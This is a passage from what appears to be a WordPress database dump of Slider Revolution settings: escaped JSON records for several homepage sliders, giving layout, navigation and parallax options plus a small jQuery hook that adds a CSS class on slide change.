alias=\\\\\\\"home-4\\\\\\\"]\",\"layouttype\":\"fullscreen\",\"type\":\"standard\",\"sourcetype\":\"gallery\",\"googleFont\":[],\"addOns\":[],\"source\":{\"gallery\":[],\"post\":{\"excerptLimit\":\"55\",\"maxPosts\":\"30\",\"fetchType\":\"cat_tag\",\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"post\",\"list\":\"\",\"sortDirection\":\"DESC\",\"subType\":\"post\"},\"woo\":{\"excerptLimit\":\"55\",\"maxProducts\":\"30\",\"featuredOnly\":false,\"inStockOnly\":false,\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"product\",\"sortDirection\":\"DESC\",\"regPriceFrom\":\"\",\"regPriceTo\":\"\",\"salePriceFrom\":\"\",\"salePriceTo\":\"\"},\"instagram\":{\"count\":\"\",\"hashTag\":\"\",\"transient\":\"1200\",\"type\":\"user\",\"userId\":\"\"},\"facebook\":{\"album\":\"\",\"appId\":\"\",\"appSecret\":\"\",\"count\":\"\",\"pageURL\":\"\",\"transient\":\"1200\",\"typeSource\":\"album\"},\"flickr\":{\"apiKey\":\"\",\"count\":\"\",\"galleryURL\":\"\",\"groupURL\":\"\",\"photoSet\":\"\",\"transient\":\"1200\",\"type\":\"publicphotos\",\"userURL\":\"\"},\"twitter\":{\"accessSecret\":\"\",\"accessToken\":\"\",\"consumerKey\":\"\",\"consumerSecret\":\"\",\"count\":\"\",\"excludeReplies\":false,\"imageOnly\":false,\"includeRetweets\":false,\"transient\":\"1200\",\"userId\":\"\"},\"vimeo\":{\"albumId\":\"\",\"channelName\":\"\",\"count\":\"\",\"transient\":\"1200\",\"groupName\":\"\",\"typeSource\":\"user\",\"userName\":\"\"},\"youtube\":{\"api\":\"\",\"channelId\":\"\",\"count\":\"\",\"playList\":\"\",\"transient\":\"1200\",\"typeSource\":\"channel\"}},\"def\":{\"transition\":\"fade\",\"transitionDuration\":\"300\",\"delay\":\"9000\",\"background\":{\"fit\":\"cover\",\"fitX\":\"100\",\"fitY\":\"100\",\"position\":\"center center\",\"positionX\":\"0\",\"positionY\":\"0\",\"repeat\":\"no-repeat\",\"imageSourceType\":\"full\"},\"panZoom\":{\"set\":false,\"blurStart\":\"0\",\"blurEnd\":\"0\",\"duration\":\"\",\"ease\":\"Linear.easeNone\",\"fitEnd\":\"100\",\"fitStart\":\"100\",\"xEnd\":\"0\",\"yEnd\":\"0\",\"xStart\":\"0\",\"yStart\":\"0\",\"rotateStart\":\"0\",\"rotateEnd\":\"0\"}},\"size\":{\"respectAspectRatio\":false,\"disableForceFullWidth\":false,\"gridEQModule\":false,\"custom\":{\"d\":true,\"n\":true,\"t\":true,\"m\":true},\"minHeightFullScreen\":\"\",\"minHeight\":\"\",\"fullScreenOffsetContainer\":\"\",\"fullScreenOffset\":\"\",\"width\":{\"d\":1920,\"n\":1366,\"t\":778,\"m\":480},\"height\":{\"d\":868,\"n\":768,\"t\":960,\"m\":720},\"overflow\":false,\"maxWidth\":\"\"},\"codes\":{\"javascript\":\"(function($){\\n $(document).ready(function(){\\n revapi5.bind(\'revolution.slide.onchange\', function(e, data) {\\n $(\'body\').addClass(\'qodef-rev-slider-loaded\');\\n });\\n });\\n})(jQuery);\",\"css\":\"\"},\"carousel\":{\"borderRadius\":\"0\",\"borderRadiusUnit\":\"px\",\"ease\":\"Power3.easeInOut\",\"fadeOut\":true,\"scale\":false,\"horizontal\":\"center\",\"vertical\":\"center\",\"infinity\":false,\"maxItems\":\"3\",\"maxRotation\":\"0\",\"paddingTop\":\"0\",\"paddingBottom\":\"0\",\"rotation\":false,\"scaleDown\":50,\"space\":\"0\",\"speed\":\"800\",\"stretch\":false,\"varyFade\":false,\"varyRotate\":false,\"varyScale\":false,\"showAllLayers\":false},\"hero\":{\"activeSlide\":\"-1\"},\"layout\":{\"bg\":{\"color\":\"transparent\",\"padding\":\"0\",\"dottedOverlay\":\"none\",\"shadow\":\"0\",\"useImage\":false,\"image\":\"\",\"fit\":\"cover\",\"position\":\"center center\",\"repeat\":\"no-repeat\"},\"spinner\":{\"color\":\"#FFFFFF\",\"type\":\"-1\"},\"position\":{\"marginTop\":\"0\",\"marginBottom\":\"0\",\"marginLeft\":\"0\",\"marginRight\":\"0\",\"align\":\"center\"}},\"visibility\":{\"hideSelectedLayersUnderLimit\":\"0\",\"hideAllLayersUnderLimit\":\"0\",\"hideSliderUnderLimit\":\"0\"},\"general\":{\"slideshow\":{\"stopOnHover\":false,\"stopSlider\":false,\"stopAfterLoops\":\"0\",\"stopAtSlide\":\"2\",\"shuffle\":false,\"loopSingle\":false,\"viewPort\":false,\"viewPortStart\":\"wait\",\"viewPortArea\":\"20%\",\"presetSliderHeight\":false,\"initDelay\":\"0\",\"waitForInit\":false,\"slideShow\":true},\"progressbar\":{\"set\":false,\"height\":\"5\",\"position\":\"top\",\"color\":\"rgba(0,0,0,0.15)\"},\"firstSlide\":{\"set\":false,\"duration\":\"300\",\"slotAmount\":\"7\",\"type\":\"fade\",\"alternativeFirstSlideSet\":false,\"alternativeFirstSlide\":\"1\"},\"layerSelection\":false,\"lazyLoad\":\"none\",\"nextSlideOnFocus\":false,\"disableFocusListener\":false,\"disableOnMobile\":false,\"autoPlayVideoOnMobile\":true,\"disablePanZoomMobile\":false,\"useWPML\":false},\"nav\":{\"preview\":{\"width\":\"100\",\"height\":\"50\"},\"swipe\":{\"set\":false,\"setOnDesktop\":false,\"blockDragVertical\":false,\"direction\":\"horizontal\",\"minTouch\":\"1\",\"velocity\":\"75\"},\"keyboard\":{\"set\":false,\"direction\":\"horizontal\"},\"mouse\":{\"set\":false,\"reverse\":\"default\"},\"arrows\":{\"set\":false,\"rtl\":false,\"style\":1,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"left\":{\"horizontal\":\"left\",\"vertical\":\"center\",\"offsetX\":\"20\",\"offsetY\":\"0\",\"align\":\"slider\"},\"right\":{\"horizontal\":\"right\",\"vertical\":\"center\",\"offsetX\":\"20\",\"offsetY\":\"0\",\"align\":\"slider\"}},\"thumbs\":{\"set\":false,\"rtl\":false,\"style\":2000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"tabs\":{\"set\":false,\"rtl\":false,\"style\":4000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"bullets\":{\"set\":false,\"rtl\":false,\"style\":3006,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"direction\":\"horizontal\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"align\":\"slider\",\"space\":\"5\",\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\"}},\"troubleshooting\":{\"ignoreHeightChanges\":false,\"ignoreHeightChangesUnderLimit\":\"0\",\"alternateImageType\":\"off\",\"alternateURL\":\"\",\"alternateURLId\":false,\"jsNoConflict\":false,\"jsInBody\":false,\"outPutFilter\":\"none\",\"debugMode\":false,\"simplify_ie8_ios4\":false},\"parallax\":{\"set\":false,\"setDDD\":false,\"disableOnMobile\":false,\"levels\":[\"5\",\"10\",\"15\",\"20\",\"25\",\"30\",\"35\",\"40\",\"45\",\"46\",\"47\",\"48\",\"49\",\"50\",\"51\",\"55\"],\"ddd\":{\"BGFreeze\":false,\"layerOverflow\":false,\"overflow\":false,\"shadow\":false,\"zCorrection\":\"65\"},\"mouse\":{\"speed\":\"400\",\"bgSpeed\":\"0\",\"layersSpeed\":\"0\",\"origo\":\"enterpoint\",\"type\":\"mouse\"}},\"scrolleffects\":{\"set\":false,\"setBlur\":false,\"setFade\":false,\"setGrayScale\":false,\"bg\":false,\"direction\":\"both\",\"maxBlur\":\"10\",\"multiplicator\":\"1.3\",\"multiplicatorLayers\":\"1.3\",\"disableOnMobile\":true,\"tilt\":\"30\",\"layers\":false},\"version\":\"6.1.6\"}','{\"version\":\"6.1.6\"}',''),(6,'Home 5','home5','{\"id\":\"\",\"shortcode\":\"[rev_slider alias=\\\\\\\"home5\\\\\\\"]\",\"layouttype\":\"fullwidth\",\"type\":\"standard\",\"sourcetype\":\"gallery\",\"googleFont\":[],\"addOns\":[],\"source\":{\"gallery\":[],\"post\":{\"excerptLimit\":\"55\",\"maxPosts\":\"30\",\"fetchType\":\"cat_tag\",\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"post\",\"list\":\"\",\"sortDirection\":\"DESC\",\"subType\":\"post\"},\"woo\":{\"excerptLimit\":\"55\",\"maxProducts\":\"30\",\"featuredOnly\":false,\"inStockOnly\":false,\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"product\",\"sortDirection\":\"DESC\",\"regPriceFrom\":\"\",\"regPriceTo\":\"\",\"salePriceFrom\":\"\",\"salePriceTo\":\"\"},\"instagram\":{\"count\":\"\",\"hashTag\":\"\",\"transient\":\"1200\",\"type\":\"user\",\"userId\":\"\"},\"facebook\":{\"album\":\"\",\"appId\":\"\",\"appSecret\":\"\",\"count\":\"\",\"pageURL\":\"\",\"transient\":\"1200\",\"typeSource\":\"album\"},\"flickr\":{\"apiKey\":\"\",\"count\":\"\",\"galleryURL\":\"\",\"groupURL\":\"\",\"photoSet\":\"\",\"transient\":\"1200\",\"type\":\"publicphotos\",\"userURL\":\"\"},\"twitter\":{\"accessSecret\":\"\",\"accessToken\":\"\",\"consumerKey\":\"\",\"consumerSecret\":\"\",\"count\":\"\",\"excludeReplies\":false,\"imageOnly\":false,\"includeRetweets\":false,\"transient\":\"1200\",\"userId\":\"\"},\"vimeo\":{\"albumId\":\"\",\"channelName\":\"\",\"count\":\"\",\"transient\":\"1200\",\"groupName\":\"\",\"typeSource\":\"user\",\"userName\":\"\"},\"youtube\":{\"api\":\"\",\"channelId\":\"\",\"count\":\"\",\"playList\":\"\",\"transient\":\"1200\",\"typeSource\":\"channel\"}},\"def\":{\"transition\":\"fade\",\"transitionDuration\":\"200\",\"delay\":\"3000\",\"background\":{\"fit\":\"cover\",\"fitX\":\"100\",\"fitY\":\"100\",\"position\":\"center center\",\"positionX\":\"0\",\"positionY\":\"0\",\"repeat\":\"no-repeat\",\"imageSourceType\":\"full\"},\"panZoom\":{\"set\":false,\"blurStart\":\"0\",\"blurEnd\":\"0\",\"duration\":\"\",\"ease\":\"Linear.easeNone\",\"fitEnd\":\"100\",\"fitStart\":\"100\",\"xEnd\":\"0\",\"yEnd\":\"0\",\"xStart\":\"0\",\"yStart\":\"0\",\"rotateStart\":\"0\",\"rotateEnd\":\"0\"}},\"size\":{\"respectAspectRatio\":false,\"disableForceFullWidth\":false,\"gridEQModule\":false,\"custom\":{\"d\":true,\"n\":true,\"t\":true,\"m\":true},\"minHeightFullScreen\":\"\",\"minHeight\":\"\",\"fullScreenOffsetContainer\":\"\",\"fullScreenOffset\":\"\",\"width\":{\"d\":1920,\"n\":1441,\"t\":778,\"m\":480},\"height\":{\"d\":725,\"n\":600,\"t\":880,\"m\":700},\"overflow\":false,\"maxWidth\":\"\"},\"codes\":{\"javascript\":\"(function($){\\n $(document).ready(function(){\\n revapi6.bind(\'revolution.slide.onchange\', function(e, data) {\\n $(\'body\').addClass(\'qodef-rev-slider-loaded\');\\n });\\n });\\n})(jQuery);\",\"css\":\"\"},\"carousel\":{\"borderRadius\":\"0\",\"borderRadiusUnit\":\"px\",\"ease\":\"Power3.easeInOut\",\"fadeOut\":true,\"scale\":false,\"horizontal\":\"center\",\"vertical\":\"center\",\"infinity\":false,\"maxItems\":\"3\",\"maxRotation\":\"0\",\"paddingTop\":\"0\",\"paddingBottom\":\"0\",\"rotation\":false,\"scaleDown\":50,\"space\":\"0\",\"speed\":\"800\",\"stretch\":false,\"varyFade\":false,\"varyRotate\":false,\"varyScale\":false,\"showAllLayers\":false},\"hero\":{\"activeSlide\":\"-1\"},\"layout\":{\"bg\":{\"color\":\"transparent\",\"padding\":\"0\",\"dottedOverlay\":\"none\",\"shadow\":\"0\",\"useImage\":false,\"image\":\"\",\"fit\":\"cover\",\"position\":\"center center\",\"repeat\":\"no-repeat\"},\"spinner\":{\"color\":\"#FFFFFF\",\"type\":\"-1\"},\"position\":{\"marginTop\":\"0\",\"marginBottom\":\"0\",\"marginLeft\":\"0\",\"marginRight\":\"0\",\"align\":\"center\"}},\"visibility\":{\"hideSelectedLayersUnderLimit\":\"0\",\"hideAllLayersUnderLimit\":\"0\",\"hideSliderUnderLimit\":\"0\"},\"general\":{\"slideshow\":{\"stopOnHover\":false,\"stopSlider\":false,\"stopAfterLoops\":\"0\",\"stopAtSlide\":\"2\",\"shuffle\":false,\"loopSingle\":false,\"viewPort\":false,\"viewPortStart\":\"wait\",\"viewPortArea\":\"20%\",\"presetSliderHeight\":false,\"initDelay\":\"0\",\"waitForInit\":false,\"slideShow\":true},\"progressbar\":{\"set\":false,\"height\":\"5\",\"position\":\"top\",\"color\":\"rgba(0,0,0,0.15)\"},\"firstSlide\":{\"set\":false,\"duration\":\"300\",\"slotAmount\":\"7\",\"type\":\"fade\",\"alternativeFirstSlideSet\":false,\"alternativeFirstSlide\":\"1\"},\"layerSelection\":false,\"lazyLoad\":\"none\",\"nextSlideOnFocus\":false,\"disableFocusListener\":false,\"disableOnMobile\":false,\"autoPlayVideoOnMobile\":true,\"disablePanZoomMobile\":false,\"useWPML\":false},\"nav\":{\"preview\":{\"width\":\"100\",\"height\":\"50\"},\"swipe\":{\"set\":false,\"setOnDesktop\":false,\"blockDragVertical\":false,\"direction\":\"vertical\",\"minTouch\":\"1\",\"velocity\":\"75\"},\"keyboard\":{\"set\":false,\"direction\":\"horizontal\"},\"mouse\":{\"set\":false,\"reverse\":\"default\"},\"arrows\":{\"set\":true,\"rtl\":false,\"style\":1,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":true,\"hideUnderLimit\":\"1024\",\"left\":{\"horizontal\":\"left\",\"vertical\":\"center\",\"offsetX\":\"0\",\"offsetY\":\"0\",\"align\":\"slider\"},\"right\":{\"horizontal\":\"right\",\"vertical\":\"center\",\"offsetX\":\"0\",\"offsetY\":\"0\",\"align\":\"slider\"}},\"thumbs\":{\"set\":false,\"rtl\":false,\"style\":2000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"tabs\":{\"set\":false,\"rtl\":false,\"style\":\"\",\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"left\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"vertical\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"0\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"0\",\"wrapperColor\":\"transparent\"},\"bullets\":{\"set\":false,\"rtl\":false,\"style\":3010,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"direction\":\"horizontal\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"align\":\"slider\",\"space\":\"5\",\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\"}},\"troubleshooting\":{\"ignoreHeightChanges\":false,\"ignoreHeightChangesUnderLimit\":\"0\",\"alternateImageType\":\"off\",\"alternateURL\":\"\",\"alternateURLId\":false,\"jsNoConflict\":false,\"jsInBody\":false,\"outPutFilter\":\"none\",\"debugMode\":false,\"simplify_ie8_ios4\":false},\"parallax\":{\"set\":true,\"setDDD\":false,\"disableOnMobile\":false,\"levels\":[\"5\",\"10\",\"15\",\"20\",\"25\",\"30\",\"35\",\"40\",\"45\",\"46\",\"47\",\"48\",\"49\",\"50\",\"51\",\"55\"],\"ddd\":{\"BGFreeze\":false,\"layerOverflow\":false,\"overflow\":false,\"shadow\":false,\"zCorrection\":\"65\"},\"mouse\":{\"speed\":\"400\",\"bgSpeed\":\"0\",\"layersSpeed\":\"0\",\"origo\":\"enterpoint\",\"type\":\"mouse\"}},\"scrolleffects\":{\"set\":false,\"setBlur\":false,\"setFade\":false,\"setGrayScale\":false,\"bg\":false,\"direction\":\"both\",\"maxBlur\":\"10\",\"multiplicator\":\"1.3\",\"multiplicatorLayers\":\"1.3\",\"disableOnMobile\":true,\"tilt\":\"30\",\"layers\":false},\"version\":\"6.1.6\"}','{\"version\":\"6.1.6\"}',''),(7,'Home 8','home8','{\"id\":\"\",\"shortcode\":\"[rev_slider alias=\\\\\\\"home8\\\\\\\"]\",\"layouttype\":\"auto\",\"type\":\"standard\",\"sourcetype\":\"gallery\",\"googleFont\":[],\"addOns\":[],\"source\":{\"gallery\":[],\"post\":{\"excerptLimit\":\"55\",\"maxPosts\":\"30\",\"fetchType\":\"cat_tag\",\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"post\",\"list\":\"\",\"sortDirection\":\"DESC\",\"subType\":\"post\"},\"woo\":{\"excerptLimit\":\"55\",\"maxProducts\":\"30\",\"featuredOnly\":false,\"inStockOnly\":false,\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"product\",\"sortDirection\":\"DESC\",\"regPriceFrom\":\"\",\"regPriceTo\":\"\",\"salePriceFrom\":\"\",\"salePriceTo\":\"\"},\"instagram\":{\"count\":\"\",\"hashTag\":\"\",\"transient\":\"1200\",\"type\":\"user\",\"userId\":\"\"},\"facebook\":{\"album\":\"\",\"appId\":\"\",\"appSecret\":\"\",\"count\":\"\",\"pageURL\":\"\",\"transient\":\"1200\",\"typeSource\":\"album\"},\"flickr\":{\"apiKey\":\"\",\"count\":\"\",\"galleryURL\":\"\",\"groupURL\":\"\",\"photoSet\":\"\",\"transient\":\"1200\",\"type\":\"publicphotos\",\"userURL\":\"\"},\"twitter\":{\"accessSecret\":\"\",\"accessToken\":\"\",\"consumerKey\":\"\",\"consumerSecret\":\"\",\"count\":\"\",\"excludeReplies\":false,\"imageOnly\":false,\"includeRetweets\":false,\"transient\":\"1200\",\"userId\":\"\"},\"vimeo\":{\"albumId\":\"\",\"channelName\":\"\",\"count\":\"\",\"transient\":\"1200\",\"groupName\":\"\",\"typeSource\":\"user\",\"userName\":\"\"},\"youtube\":{\"api\":\"\",\"channelId\":\"\",\"count\":\"\",\"playList\":\"\",\"transient\":\"1200\",\"typeSource\":\"channel\"}},\"def\":{\"transition\":\"fade\",\"transitionDuration\":\"300\",\"delay\":\"3000\",\"background\":{\"fit\":\"cover\",\"fitX\":\"100\",\"fitY\":\"100\",\"position\":\"center center\",\"positionX\":\"0\",\"positionY\":\"0\",\"repeat\":\"no-repeat\",\"imageSourceType\":\"full\"},\"panZoom\":{\"set\":false,\"blurStart\":\"0\",\"blurEnd\":\"0\",\"duration\":\"\",\"ease\":\"Linear.easeNone\",\"fitEnd\":\"100\",\"fitStart\":\"100\",\"xEnd\":\"0\",\"yEnd\":\"0\",\"xStart\":\"0\",\"yStart\":\"0\",\"rotateStart\":\"0\",\"rotateEnd\":\"0\"}},\"size\":{\"respectAspectRatio\":false,\"disableForceFullWidth\":false,\"gridEQModule\":false,\"custom\":{\"d\":true,\"n\":true,\"t\":true,\"m\":true},\"minHeightFullScreen\":\"\",\"minHeight\":\"\",\"fullScreenOffsetContainer\":\"\",\"fullScreenOffset\":\"\",\"width\":{\"d\":1300,\"n\":1024,\"t\":778,\"m\":480},\"height\":{\"d\":868,\"n\":545,\"t\":960,\"m\":720},\"overflow\":false,\"maxWidth\":\"\"},\"codes\":{\"javascript\":\"(function($){\\n $(document).ready(function(){\\n revapi7.bind(\'revolution.slide.onchange\', function(e, data) {\\n $(\'body\').addClass(\'qodef-rev-slider-loaded\');\\n });\\n });\\n})(jQuery);\",\"css\":\"\"},\"carousel\":{\"borderRadius\":\"0\",\"borderRadiusUnit\":\"px\",\"ease\":\"Power3.easeInOut\",\"fadeOut\":true,\"scale\":false,\"horizontal\":\"center\",\"vertical\":\"center\",\"infinity\":false,\"maxItems\":\"3\",\"maxRotation\":\"0\",\"paddingTop\":\"0\",\"paddingBottom\":\"0\",\"rotation\":false,\"scaleDown\":50,\"space\":\"0\",\"speed\":\"800\",\"stretch\":false,\"varyFade\":false,\"varyRotate\":false,\"varyScale\":false,\"showAllLayers\":false},\"hero\":{\"activeSlide\":\"-1\"},\"layout\":{\"bg\":{\"color\":\"transparent\",\"padding\":\"0\",\"dottedOverlay\":\"none\",\"shadow\":\"0\",\"useImage\":false,\"image\":\"\",\"fit\":\"cover\",\"position\":\"center center\",\"repeat\":\"no-repeat\"},\"spinner\":{\"color\":\"#FFFFFF\",\"type\":\"-1\"},\"position\":{\"marginTop\":\"0\",\"marginBottom\":\"0\",\"marginLeft\":\"0\",\"marginRight\":\"0\",\"align\":\"center\"}},\"visibility\":{\"hideSelectedLayersUnderLimit\":\"0\",\"hideAllLayersUnderLimit\":\"0\",\"hideSliderUnderLimit\":\"0\"},\"general\":{\"slideshow\":{\"stopOnHover\":false,\"stopSlider\":false,\"stopAfterLoops\":\"0\",\"stopAtSlide\":\"2\",\"shuffle\":false,\"loopSingle\":false,\"viewPort\":false,\"viewPortStart\":\"wait\",\"viewPortArea\":\"20%\",\"presetSliderHeight\":false,\"initDelay\":\"0\",\"waitForInit\":false,\"slideShow\":true},\"progressbar\":{\"set\":false,\"height\":\"5\",\"position\":\"top\",\"color\":\"rgba(0,0,0,0.15)\"},\"firstSlide\":{\"set\":false,\"duration\":\"300\",\"slotAmount\":\"7\",\"type\":\"fade\",\"alternativeFirstSlideSet\":false,\"alternativeFirstSlide\":\"1\"},\"layerSelection\":false,\"lazyLoad\":\"none\",\"nextSlideOnFocus\":false,\"disableFocusListener\":false,\"disableOnMobile\":false,\"autoPlayVideoOnMobile\":true,\"disablePanZoomMobile\":false,\"useWPML\":false},\"nav\":{\"preview\":{\"width\":\"100\",\"height\":\"50\"},\"swipe\":{\"set\":false,\"setOnDesktop\":false,\"blockDragVertical\":false,\"direction\":\"horizontal\",\"minTouch\":\"1\",\"velocity\":\"75\"},\"keyboard\":{\"set\":false,\"direction\":\"horizontal\"},\"mouse\":{\"set\":false,\"reverse\":\"default\"},\"arrows\":{\"set\":true,\"rtl\":false,\"style\":1,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":true,\"hideUnderLimit\":\"1024\",\"left\":{\"horizontal\":\"left\",\"vertical\":\"center\",\"offsetX\":\"0\",\"offsetY\":\"0\",\"align\":\"slider\"},\"right\":{\"horizontal\":\"right\",\"vertical\":\"center\",\"offsetX\":\"0\",\"offsetY\":\"0\",\"align\":\"slider\"}},\"thumbs\":{\"set\":false,\"rtl\":false,\"style\":2010,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"vertical\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"tabs\":{\"set\":false,\"rtl\":false,\"style\":4000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"vertical\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"bullets\":{\"set\":false,\"rtl\":false,\"style\":3000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"direction\":\"horizontal\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"align\":\"slider\",\"space\":\"5\",\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\"}},\"troubleshooting\":{\"ignoreHeightChanges\":false,\"ignoreHeightChangesUnderLimit\":\"0\",\"alternateImageType\":\"off\",\"alternateURL\":\"\",\"alternateURLId\":false,\"jsNoConflict\":false,\"jsInBody\":false,\"outPutFilter\":\"none\",\"debugMode\":false,\"simplify_ie8_ios4\":false},\"parallax\":{\"set\":false,\"setDDD\":false,\"disableOnMobile\":false,\"levels\":[\"5\",\"10\",\"15\",\"20\",\"25\",\"30\",\"35\",\"40\",\"45\",\"46\",\"47\",\"48\",\"49\",\"50\",\"51\",\"55\"],\"ddd\":{\"BGFreeze\":false,\"layerOverflow\":false,\"overflow\":false,\"shadow\":false,\"zCorrection\":\"65\"},\"mouse\":{\"speed\":\"400\",\"bgSpeed\":\"0\",\"layersSpeed\":\"0\",\"origo\":\"enterpoint\",\"type\":\"mouse\"}},\"scrolleffects\":{\"set\":false,\"setBlur\":false,\"setFade\":false,\"setGrayScale\":false,\"bg\":false,\"direction\":\"both\",\"maxBlur\":\"10\",\"multiplicator\":\"1.3\",\"multiplicatorLayers\":\"1.3\",\"disableOnMobile\":true,\"tilt\":\"30\",\"layers\":false},\"version\":\"6.1.6\"}','{\"version\":\"6.1.6\"}',''),(8,'Home 10','home-10','{\"id\":\"\",\"shortcode\":\"[rev_slider alias=\\\\\\\"home-10\\\\\\\"]\",\"layouttype\":\"fullscreen\",\"type\":\"standard\",\"sourcetype\":\"gallery\",\"googleFont\":[],\"addOns\":[],\"source\":{\"gallery\":[],\"post\":{\"excerptLimit\":\"55\",\"maxPosts\":\"30\",\"fetchType\":\"cat_tag\",\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"post\",\"list\":\"\",\"sortDirection\":\"DESC\",\"subType\":\"post\"},\"woo\":{\"excerptLimit\":\"55\",\"maxProducts\":\"30\",\"featuredOnly\":false,\"inStockOnly\":false,\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"product\",\"sortDirection\":\"DESC\",\"regPriceFrom\":\"\",\"regPriceTo\":\"\",\"salePriceFrom\":\"\",\"salePriceTo\":\"\"},\"instagram\":{\"count\":\"\",\"hashTag\":\"\",\"transient\":\"1200\",\"type\":\"user\",\"userId\":\"\"},\"facebook\":{\"album\":\"\",\"appId\":\"\",\"appSecret\":\"\",\"count\":\"\",\"pageURL\":\"\",\"transient\":\"1200\",\"typeSource\":\"album\"},\"flickr\":{\"apiKey\":\"\",\"count\":\"\",\"galleryURL\":\"\",\"groupURL\":\"\",\"photoSet\":\"\",\"transient\":\"1200\",\"type\":\"publicphotos\",\"userURL\":\"\"},\"twitter\":{\"accessSecret\":\"\",\"accessToken\":\"\",\"consumerKey\":\"\",\"consumerSecret\":\"\",\"count\":\"\",\"excludeReplies\":false,\"imageOnly\":false,\"includeRetweets\":false,\"transient\":\"1200\",\"userId\":\"\"},\"vimeo\":{\"albumId\":\"\",\"channelName\":\"\",\"count\":\"\",\"transient\":\"1200\",\"groupName\":\"\",\"typeSource\":\"user\",\"userName\":\"\"},\"youtube\":{\"api\":\"\",\"channelId\":\"\",\"count\":\"\",\"playList\":\"\",\"transient\":\"1200\